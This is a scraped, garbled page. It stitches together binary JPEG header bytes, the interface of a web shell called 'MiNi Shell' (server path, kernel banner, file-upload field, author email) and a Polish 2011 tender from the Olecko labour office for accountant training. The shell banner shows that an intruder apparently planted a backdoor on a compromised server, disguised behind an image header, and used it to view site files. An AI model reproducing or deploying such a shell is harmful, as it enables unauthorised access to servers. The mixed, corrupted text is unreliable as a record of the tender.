JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110524/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110524/127206-N-2011.html

<p class="kh_header"><b>Olecko: Szkolenie doskonalące dla właścicieli  biur rachunkowych</b><br>
<b>Numer ogłoszenia: 127206 - 2011; data zamieszczenia: 24.05.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowy Urząd Pracy w Olecku , ul. Armii Krajowej 30, 19-400 Olecko, woj. warmińsko-mazurskie, tel. 0-87 520-30-78, faks 0-87 520-27-46.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Szkolenie doskonalące dla właścicieli  biur rachunkowych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Szkoleniem  zostanie  objętych 10 osób będących właścicielami oraz pracownikami biur rachunkowych prowadzących działalność gospodarczą na terenie powiatu oleckiego i powiatu gołdapskiego.  Lista osób skierowanych na szkolenie  stanowić będzie  załącznik do umowy.  Wykonawca dostosuje program szkolenia do wymagań i oczekiwań uczestników szkolenia. Zajęcia odbywać się będą  przez 5 dni. Ogółem liczba godzin szkolenia  - 40, w tym 20 godzin - Międzynarodowe  Standardy Sprawozdawczości Finansowej, 12 godzin - Kontrola finansowa i  audyt wewnętrzny w firmie, 8 godzin- Nowe obowiązki biur  rachunkowych, czyli jak przeciwdziałać  praniu pieniędzy.  W ramach 40 godz. szkolenia Wykonawca  zorganizuje  i zapewni uczestnikom co najmniej jedną minimum 6 godz. wizytę studyjną prezentującą  dobre praktyki w zakresie tematyki szkolenia. Zamawiający dopuszcza  organizację większej ilości wizyt z zastrzeżeniem, iż łączny czas ich przeprowadzenia winien wynosić minimum 6 godz. Wykonawca załączy do oferty szczegółowy program szkolenia określający nazwę zajęć edukacyjnych, ich wymiar godzinowy, treści kształcenia w zakresie poszczególnych zajęć edukacyjnych oraz formy prowadzenia zajęć - np. wykład, warsztaty itp. Zamawiający  zastrzega,  konieczność weryfikacji zagadnień szkolenia pod kątem oczekiwań uczestników szkolenia, zgłoszonych w trakcie pierwszego spotkania.  Program szkolenia musi odpowiadać wymogom określonym w § 5 Rozporządzenia Ministra Edukacji i Nauki z dnia 03 luty 2006  r. w sprawie uzyskiwania i uzupełniania przez osoby dorosłe wiedzy ogólnej, umiejętności i kwalifikacji zawodowych w formach pozaszkolnych ( Dz. U. 2006 Nr 31, poz. 216). Szkolenie ma mieć charakter wyjazdowy, miejsce realizacji szkolenia:  obszar Trójmiasta. Wykonawca zabezpieczy uczestnikom bazę noclegową w co najmniej III gwiazdkowym hotelu lub o standardzie równorzędnym. Każdy uczestnik szkolenia zostanie zakwaterowany w pokoju jednoosobowym lub dwuosobowym. Zakwaterowanie nastąpi wieczorem w dzień poprzedzający pierwszy dzień szkolenia. Wykonawca przedstawi informacje o hotelu dokumentując, że obiekt posiada wymagany przez Zamawiającego standard.  Wykonawca zabezpieczy uczestnikom szkolenia pełne wyżywienie  - 3 posiłki dziennie na które składać będzie się:  śniadanie - szwedzki stół; obiad złożony z dwóch dań, zestawu sałatek, napoju; kolacja - szwedzki stół  - a także  - w  trakcie prowadzonych zajęć szkoleniowych stały catering w postaci kawy, herbaty,  wody mineralnej, soków, ciasteczek itp. W cenie szkolenia Wykonawca uwzględni koszt  dodatkowego noclegu wraz z wyżywieniem związany z przyjazdem uczestników  w przeddzień szklenia.  Zajęcia  szkoleniowe  odbywać się powinny w pomieszczeniach  klimatyzowanych  z dostępem do zaplecza socjalnego i sanitarnego, przystosowanych do prowadzenia zajęć dla minimum 10 osób, wyposażonych w stoliki, krzesła, tablicę typu flipchart z zapasem kartek, tablicę kredową i-lub suchościeralną,  laptop dla wykładowcy, rzutnik multimedialny,  ekran projekcyjny.  Wykonawca zapewni uczestnikom materiały szkoleniowe,  na które mają się składać:  podręcznik/skrypt  zgodny z zakresem tematycznym szkolenia i z aktualnym stanem prawnym,  notatnik formatu A4 zawierający co najmniej 50 kartek, 1 długopis, segregator, opracowane w formie papierowej autorskie  prezentacje i konspekty zajęć, aktualnie obowiązujące przepisy prawne w omawianym zakresie.  Ponadto każdy uczestnik szkolenia otrzyma program szkolenia i  harmonogram zajęć. Materiały szkoleniowe powinny być przekazane uczestnikom za pokwitowaniem i po zakończeniu szkolenia przejść w ich posiadanie. Materiały szkoleniowe powinny być opatrzone logo Europejskiego Funduszu Społecznego i Programu Operacyjnego Kapitał Ludzki oraz informacją  o współfinansowaniu szkolenia ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego  i nazwą projektu. Wykonawca zapewni transport z Olecka do miejsca szkolenia i z powrotem klimatyzowanym busem przystosowanym do przewozu   min.  10  osób wraz z bagażami. Wyjazd z Olecka nastąpi w dzień poprzedzający pierwszy dzień szkolenia, w godzinach  umożliwiających swobodny dojazd do miejsca szkolenia. Koszty transportu Wykonawca  wliczy w cenę szkolenia.  Wraz z ofertą Wykonawca  przedstawi  Zamawiającemu harmonogram  zajęć szkoleniowych, w którym ujęty zostanie wymiar czasowy poruszanych zagadnień, a także nazwiska osób prowadzących. Wykonawca ubezpieczy uczestników szkolenia od następstw nieszczęśliwych wypadków  na czas podróży i szkolenia  z założeniem, że w szkoleniu  uczestniczyć będzie  wskazana przez Zamawiającego liczba osób. Koszty ubezpieczenia należy wliczyć w cenę szkolenia. Cena brutto za zrealizowanie szkolenia  winna zostać obliczona na podstawie wszelkich    kosztów poniesionych przez Wykonawcę w związku z realizacją zamówienia. Zamawiający zastrzega, że liczba uczestników szkolenia  może ulec zmianie polegającej na   zmniejszeniu liczby uczestników. Wynagrodzenie Wykonawcy należne z tytułu realizacji szkolenia w przypadku skierowania mniejszej  liczby uczestników zostanie pomniejszone  o koszt  pobytu (tj. koszty zakwaterowania i wyżywienia) jednej osoby  określony  w formularzu cenowym pomnożony przez liczbę osób o jaką zmniejszy się ilość uczestników szkolenia. Po zakończeniu szkolenia  uczestnicy otrzymają: - zaświadczenia  o  ukończeniu szkolenia zgodnie z rozporządzeniem MEN z dnia 03.02.2006 r. sprawie uzyskiwania i uzupełniania przez osoby dorosłe wiedzy ogólnej, umiejętności i kwalifikacji zawodowych w formach pozaszkolnych(Dz. U. Nr 31 poz. 216) -  certyfikaty  z logo EFS.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Rozpoczęcie: 25.07.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>oświadczenie wykonawcy o spełnianiu warunków udziału w postępowaniu określonych w art. 22 ust.1 pkt 1-4 ustawy pzp</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>warunek ten zostanie uznany za spełniony przez Wykonawcę, który przeprowadził  w ciągu ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, minimum 120 godzin szkoleniowych o tematyce finansowo-ksiegowej</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>warunek ten zostanie uznany za spełniony  przez Wykonawcę, który wykaże, że  dysponuje  bazą noclegową w co najmniej III gwiazdkowym hotelu lub o standardzie równorzędnym; salą szkoleniową klimatyzowaną z dostępem do zaplecza socjalnego i sanitarnego, przystosowaną do prowadzenia zajęć dla minimum 10  osób, wyposażoną w stoliki, krzesła, tablicę typu flipchart z zapasem kartek, tablicę kredową i-lub suchościeralną,  laptop dla wykładowcy, rzutnik multimedialny  ekran projekcyjny</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>warunek ten zostanie uznany za spełniony przez Wykonawcę, który wykaże,  że  dysponuje lub będzie dysponował  co najmniej:
           -  2  trenerami posiadającymi uprawnienia biegłego rewidenta, wpisanymi do rejestru biegłych rewidentów, doświadczenie trenerskie w prowadzeniu szkoleń/kursów/zajęć  o tematyce finansowo-księgowej wymiarze co najmniej 100 godzin w ciągu ostatnich 3 lat przed upływem terminu składania ofert; co najmniej jeden z trenerów powinien posiadać doświadczenie w powadzeniu szkoleń w zakresie MSSF, MSR w wymiarze minimum 40 godzin w ostatnim roku przed upływem terminu składania ofert.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
</li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>OFERTA,	Formularz cenowy,	Szczegółowy program szkolenia,Harmonogram zajęć szkoleniowych, Projekt zaświadczenia i certyfikatu z logo EFS, Informacje o hotelu dokumentujące posiadany  standard, 	Dokument, z którego wynikać będzie umocowanie Wykonawcy do podpisania oferty.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 70</li>
<li>2 - Certyfikat jakości usług - 30</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Każda zmiana warunków wykonywania umowy w szczególności dotycząca kadry szkolącej, terminu realizacji szkolenia, harmonogramu usługi  naruszająca postanowienia umowy wymaga natychmiastowego powiadomienia Zamawiającego i uzyskania jego pisemnej zgody, z zastrzeżeniem, iż zmiana w składzie kadry szkolącej może nastąpić wyłącznie w sytuacjach losowych, których Wykonawca nie mógł przewidzieć. W takim przypadku Wykonawca zapewni osoby na zastępstwo o równorzędnych  lub wyższych kwalifikacjach. W razie wystąpienia istotnej zmiany okoliczności powodującej, że wykonanie umowy nie leży w interesie publicznym, czego nie można było przewidzieć w chwili zawarcia umowy, Zamawiający może odstąpić od umowy w terminie 30 dni od powzięcia wiadomości o tych okolicznościach. W takim przypadku Wykonawca może żądać jedynie wynagrodzenia należnego mu z tytułu wykonania części umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.pup.olecko.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Powiatowy Urząd Pracy w Olecku ul. Armii Krajowej 30; 19-400 Olecko pokój nr 6.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 13.06.2011 godzina 15:00, miejsce: Powiatowy Urząd Pracy w Olecku ul. Armii Krajowej 30; 19-400 Olecko pokój nr 14.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamnówienie puliczne  realizowane jest w ramach projekt  Księgowość bez tajemnic  współfinansowanego ze środków Unii Europejskiej 
w ramach Europejskiego Funduszu Społecznego PODDZIAŁANIE 8.1.1 POKL.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com